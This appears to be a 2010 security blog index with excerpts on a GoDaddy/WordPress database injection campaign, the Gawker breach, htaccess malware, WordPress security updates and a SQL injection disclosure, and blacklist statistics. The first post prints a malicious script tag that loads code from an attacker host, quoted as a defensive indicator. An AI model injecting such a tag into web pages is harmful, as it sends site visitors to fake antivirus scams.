Attacks against GoDaddy – acrossuniverseitbenet + Hilary Kneber + HardSoft

For the last few days we’ve tracking another large scale attack against GoDaddy shared-hosted sites. GoDaddy has been a target for a while, with mass infections happening often.

This time, the attackers changed tactics and instead of infecting the PHP files, they injected malicious code inside the database. On the WordPress infected sites, they added the following javascript inside every post (on the wp_posts table):

<script src= "http://acrossuniverseitbenet.com/js.php?kk=10″></script>

As you can imagine, this javascript redirects the user to the infamous “Fake AV” pages:

Read More

Weekly malware update – 2010/Dec/17

Starting this week, we’re going to begin posting a weekly malware update about the issues (always malware-related ) that arise throughout the week.

This is the first one and you will be able to track those by following our malware_updates category.

    *If your site has been affected with any of those issues, contact us at support@sucuri.net or visit http://sucuri.net to get help or if you want to share some information with us.


Read More

Analysis of the Gawker compromise

As most of you probably know, Gawker media’s servers were compromised, resulting in a security breach at Lifehacker, Gizmodo, Gawker, Jezebel, io9, Jalopnik, Kotaku, Deadspin, and Fleshbot. It means that if you’ve ever had an account on any of those sites, it was compromised.

It also means that if you like to re-use your passwords, your accounts at other sites could be compromised as well (including Gmail, Twitter, Hotmail, etc).

So, if you have an account on any of those sites, make sure to change your passwords ASAP! Not only at those Gawker sites, but everywhere you used the same password!

 

Analysis of the attack

We don’t know exactly how they got access to the site, but the attackers were “kind” enough to post a readme and tell their side of the story. You can read it here: http://sucuri.net/mirror/gawker-readme.txt

It seems it all started with one account getting stolen, followed by re-using the same password on another resources (email, basecamp, etc), followed by critical information stored on emails, followed by a mass compromise. You get the picture!

It teaches us a few lessons:

  1. Do not re-use your passwords.
  2. Access control: Restrict access to some resources by IP address.
  3. The importance of log analysis – If they were just looking at their logs, they would have detected the compromise a lot earlier.



Read More

Malware update: publifacil.org – htaccess changes and PE*.php

The last few days we’ve been tracking a large number of sites infected with a very interesting piece of malware.

All the sites hacked so far contain the following in their .htaccess file (PEcasas.php could be many names like PEtherm.php, PEmerle.php, PEirade.php, PEdropt.php, PErodeo.php, etc):

Those PE*.php files have a very long piece of code:

Read More

WordPress 3.0.3 released (security update)

Running WordPress? Time to update it again! Version 3.0.3 has been released fixing some security vulnerabilities. If you can’t upgrade, make sure to disable remote publishing by going to the page “Settings → Writing” to see if it is disabled.

Details http://wordpress.org/news/2010/12/wordpress-3-0-3/

This release fixes issues in the remote publishing interface, which under certain circumstances allowed Author- and Contributor-level users to improperly edit, publish, or delete posts.

These issues only affect sites that have remote publishing enabled.

Remote publishing is disabled by default, but you may have enabled it to use a remote publishing client such as one of the WordPress mobile apps. You can check these settings on the “Settings → Writing” screen.


Read More

WordPress 0 day exploit (version 3.0.1 and older)

We posted last week about the release of WordPress 3.0.2 that fixes a few security vulnerabilities.

Today, full details of the vulnerability and exploit code have been released. So if you haven’t upgraded yet, make sure to do so now (specially if your site has multiple authors).

“The do_trackbacks() function in wp-includes/comment.php does not properly escape the input that comes from the user, allowing a remote user with publish_posts and edit_published_posts capabilities to execute an arbitrary SELECT SQL query, which can lead to disclosure of any information stored in the WordPress database.”

Details here: http://www.vul.kr/wordpress-all-version-0day-exploit


Interested in WordPress security monitoring, visit http://sucuri.net.

Alexa top sites – Blacklist for November

Every month we analyze Alexa’s TOP 1 million site ranking and correlate that data with Google’s blacklist. Our goal is to get an overall view of the sites that are getting hacked, blacklisted, etc.

For Nov-2010, the number is pretty standard, but a little bit bellow from previous months. Out of those top 1 million sites, around 2.2 thousand got their main domain blacklisted (2,252 to be more exact) against 3 thousand from October. Out of the top 100k, more than 248 got blacklisted by Google.

Over time, only 636 sites that were blacklisted in previous months are still blacklisted and in the TOP 1 million ranking.

Those are the top 100 sites that got flagged and their respective ranking (You can get the full list here):

Out of the non-malicious blacklisted sites (the ones that got hacked and fixed), more than 14% were using WordPress and 13% were using osCommerce (largely attacked this month). A lot of “.co.cc” sites were well ranked (and blacklisted), but all of them were malicious in nature (phishing).

For our Canadian friends, rogersplus.ca (from Rogers, one of the biggest cable/TV/phone companies in Canada), got blacklisted as well.

We will post more details in future posts. If you have any question or comment about it, let us know.